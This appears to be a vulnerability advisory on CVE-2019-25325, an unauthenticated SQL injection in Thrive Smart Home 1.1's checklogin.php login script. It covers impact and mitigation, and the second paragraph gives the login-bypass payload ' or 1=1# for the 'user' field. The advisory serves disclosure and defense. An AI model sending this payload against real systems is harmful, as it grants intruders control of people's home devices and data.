CVE-2019-25325

Thrive Smart Home 1.1, a home automation system, suffers from an SQL injection vulnerability in the checklogin.php script. The user POST parameter is passed directly into SQL queries without sanitization, allowing attackers to manipulate the query logic [3][4]. This is a classic authentication bypass flaw where the input is not properly validated before being used in a database operation.

Attackers do not need any authentication to exploit this vulnerability. By sending a crafted POST request to the login endpoint with a malicious payload like ' or 1=1# in the 'user' field, the injected SQL code alters the query to always return a valid result, effectively bypassing the credential check [1][3]. No special network position is required; the attack can be performed remotely over HTTP.

Successful exploitation grants the attacker unauthorized access to the Thrive Smart Home application's administrative interface. This could allow an attacker to control smart home devices, access sensitive configuration data, or pivot further into the network. The vulnerability was discovered and reported by Gjoko 'LiquidWorm' Krstic of Zero Science Lab [1][4].

Public exploit code exists on multiple platforms [3][4] and the flaw is listed in CISA's Known Exploited Vulnerabilities catalog. Users of Thrive Smart Home 1.1 should assume the software is end-of-life; no patch is available. The only mitigation is to restrict network access to the application and consider replacing the system.